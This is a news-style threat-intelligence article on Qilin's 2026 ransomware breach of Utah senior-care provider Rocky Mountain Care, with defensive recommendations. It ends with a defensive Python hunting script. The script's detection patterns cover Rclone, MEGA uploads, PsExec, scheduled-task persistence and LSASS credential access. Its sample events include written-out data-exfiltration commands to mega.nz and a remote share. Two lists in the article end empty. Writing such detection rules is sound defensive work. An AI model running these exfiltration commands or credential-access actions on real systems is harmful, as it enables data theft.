Rocky Mountain Care, a Woods Cross, Utah-based provider of skilled nursing and home health services for seniors across Utah and Wyoming, has confirmed a ransomware incident in which an unauthorized third party accessed files on its network between January 30 and February 2, 2026. The Qilin ransomware group claimed responsibility by listing the organization on its dark web leak site on February 23, 2026. The provider disclosed the breach publicly on March 27, 2026.

What Happened

According to Rocky Mountain Care's official breach notice dated March 27, 2026, an unauthorized third party gained access to certain files on the organization's network over a four-day window spanning January 30 to February 2, 2026. The intrusion was not publicly acknowledged until Qilin operators posted Rocky Mountain Care to their dark web data leak site on February 23, issuing a ransom demand and threatening to publish exfiltrated data if payment was refused.

Rocky Mountain Care engaged third-party forensic specialists to investigate the scope of the compromise and secure its environment. The organization has not disclosed whether a ransom was paid, nor has it confirmed the volume of data exfiltrated. A review of affected data is ongoing to determine whether protected health information (PHI) is involved, and the company has committed to direct notification of affected individuals once that analysis concludes.

What Was Taken

The full contents and volume of stolen data have not been disclosed. Rocky Mountain Care has stated that certain files were "viewed or taken without authorization" during the intrusion window, but the data review remains in progress. Given the organization's role as a skilled nursing and home health provider for elderly patients, the likely categories of exposure include:

For comparative scale, Qilin's May 2025 attack on New England-based Covenant Health involved approximately 852 GB of data across 1.35 million files, ultimately impacting roughly 478,000 patients.

Why It Matters

Rocky Mountain Care serves a population that is uniquely vulnerable to identity theft, financial fraud, and medical exploitation. Senior care patients frequently possess clean credit histories, stable Medicare coverage, and reduced capacity to monitor their own accounts, making their stolen identity data especially valuable on criminal markets.

The incident reinforces Qilin's aggressive posture against U.S. healthcare providers. The group has emerged as one of the most prolific ransomware-as-a-service (RaaS) operations targeting the sector in 2025 and 2026, with a consistent pattern of double extortion against hospitals, long-term care facilities, and elder care networks. For defenders across the healthcare vertical, Qilin's operational tempo and sector focus should be treated as an active, ongoing threat rather than a one-off concern.

The Attack Technique

Rocky Mountain Care has not publicly disclosed the initial access vector, payload family variant, or tactics used during the four-day intrusion window. However, Qilin affiliates have historically relied on a consistent set of techniques observed across prior healthcare engagements:

The compressed dwell time of roughly four days is consistent with Qilin's recent "smash and grab" approach, prioritizing rapid exfiltration over prolonged reconnaissance.

What Organizations Should Do

Healthcare organizations, particularly those in long-term and senior care, should treat this incident as a prompt to validate controls against Qilin tradecraft:

  1. Audit external-facing infrastructure. Patch and harden VPN concentrators, remote access gateways, and any edge appliances. Enforce MFA on every remote access pathway without exception.
  2. Hunt for known Qilin indicators. Search for anomalous use of Rclone, MEGA uploads, PsExec execution, and scheduled tasks creating persistence. Review EDR telemetry for LSASS access attempts.
  3. Segment clinical and administrative networks. Ensure EHR systems, backup infrastructure, and domain controllers are isolated from general workstation traffic to limit lateral movement.
  4. Validate offline, immutable backups. Test restore procedures regularly and ensure at least one backup copy is air-gapped or otherwise unreachable from production credentials.
  5. Rehearse breach notification workflows. Confirm legal, communications, and HIPAA notification processes are ready to execute within required timelines should an incident occur.
  6. Monitor Qilin's leak site. Track the group's dark web infrastructure for early indicators that a partner, vendor, or peer organization has been compromised, enabling faster third-party risk response.
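As an added example (not from the original article or from Rocky Mountain Care's investigation), the hunt in step 2 expressed as a small Python script over constructed process-creation and process-access events: it flags Rclone and PsExec execution, uploads to mega.nz, scheduled-task creation, and LSASS handle grants. The event field names and the LSASS access masks are assumptions chosen to resemble Sysmon-style telemetry.

```python
import re

# Each rule is a regex applied to the lowercased "<image> <command line>" text.
# String matching is a starting point only: a renamed rclone binary evades the
# first rule, so pair this with hash or code-signing checks in a real hunt.
HUNT_RULES = [
    ("rclone_execution", re.compile(r"(^|\\)rclone(\.exe)?\b")),
    ("mega_upload", re.compile(r"mega\.(nz|co\.nz|io)")),
    ("psexec_execution", re.compile(r"(^|\\)psexec(64)?(\.exe)?\b|psexesvc")),
    ("schtasks_create", re.compile(r"(^|\\)schtasks(\.exe)?\b.*/create")),
]
# Assumed set of GrantedAccess values commonly associated with credential dumping.
LSASS_ACCESS_MASKS = {"0x1010", "0x1038", "0x1fffff"}


def hunt(events):
    """Return (rule, host, pid) findings. Assumed event shape:
    process: {"type": "process", "host", "pid", "image", "cmd"}
    access:  {"type": "access", "host", "pid", "target", "granted_access"}"""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            text = f'{ev["image"]} {ev.get("cmd", "")}'.lower()
            for name, rx in HUNT_RULES:
                if rx.search(text):
                    findings.append((name, ev["host"], ev["pid"]))
        elif ev["type"] == "access":
            if (ev["target"].lower().endswith("lsass.exe")
                    and ev["granted_access"].lower() in LSASS_ACCESS_MASKS):
                findings.append(("lsass_access", ev["host"], ev["pid"]))
    return findings


# Constructed sample telemetry: two benign events mixed with the indicators above.
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws-12", "pid": 4412, "image": "c:\\windows\\system32\\svchost.exe", "cmd": "svchost.exe -k netsvcs"},
    {"type": "process", "host": "ws-12", "pid": 5120, "image": "c:\\users\\public\\rclone.exe", "cmd": "rclone.exe copy c:\\shares\\records remote:"},
    {"type": "process", "host": "ws-12", "pid": 5188, "image": "c:\\windows\\system32\\curl.exe", "cmd": "curl -T archive.7z https://mega.nz/upload"},
    {"type": "process", "host": "fs-01", "pid": 2231, "image": "c:\\windows\\psexesvc.exe", "cmd": "psexesvc.exe"},
    {"type": "process", "host": "fs-01", "pid": 2290, "image": "c:\\windows\\system32\\schtasks.exe", "cmd": "schtasks.exe /create /tn updater /tr c:\\users\\public\\run.bat /sc onlogon"},
    {"type": "process", "host": "fs-01", "pid": 2301, "image": "c:\\windows\\system32\\schtasks.exe", "cmd": "schtasks.exe /query"},
    {"type": "access", "host": "fs-01", "pid": 2402, "target": "c:\\windows\\system32\\lsass.exe", "granted_access": "0x1010"},
    {"type": "access", "host": "fs-01", "pid": 880, "target": "c:\\windows\\system32\\lsass.exe", "granted_access": "0x1400"},
]

if __name__ == "__main__":
    for rule, host, pid in hunt(SAMPLE_EVENTS):
        print(f"{host}\tpid={pid}\t{rule}")
```

The benign svchost, `schtasks /query`, and low-privilege LSASS events produce no findings, so the output is the five suspicious events only.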

Sources: Rocky Mountain Care discloses ransomware attack, Qilin claims responsibility